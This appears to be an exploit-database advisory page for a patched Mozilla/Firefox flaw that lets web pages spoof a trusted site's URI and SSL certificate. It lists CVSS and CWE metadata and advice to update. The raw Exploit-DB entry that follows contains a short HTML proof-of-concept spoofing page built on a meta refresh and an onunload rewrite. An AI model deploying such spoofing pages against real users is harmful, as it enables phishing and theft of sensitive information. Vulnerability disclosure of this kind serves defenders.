Spoofing of trusted site security properties in Mozilla and Firefox

vendor:

Mozilla Firefox

by:

7.5

CVSS

HIGH

Spoofing

290

CWE

Product Name: Mozilla Firefox

Affected Version From:

Affected Version To:

Patch Exists: YES

Related CWE:

CPE: cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux, Mac

Spoofing of trusted site security properties in Mozilla and Firefox

The vulnerability allows malicious web pages to spoof the URI and SSL certificate of a trusted site, leading to potential phishing attacks and theft of sensitive information.

Mitigation:

Mozilla and Firefox users should update to the latest version to mitigate this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10796/info

Mozilla and Firefox may permit malicious Web pages to spoof security properties of a trusted site.

An attacker can exploit this issue to spoof the URI and SSL certificate of a site trusted by an unsuspecting user. The attacker can then use this spoofing to steal sensitive or private information, facilitating phishing attacks

< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');

document.close();
window.location.reload();
">
< /body>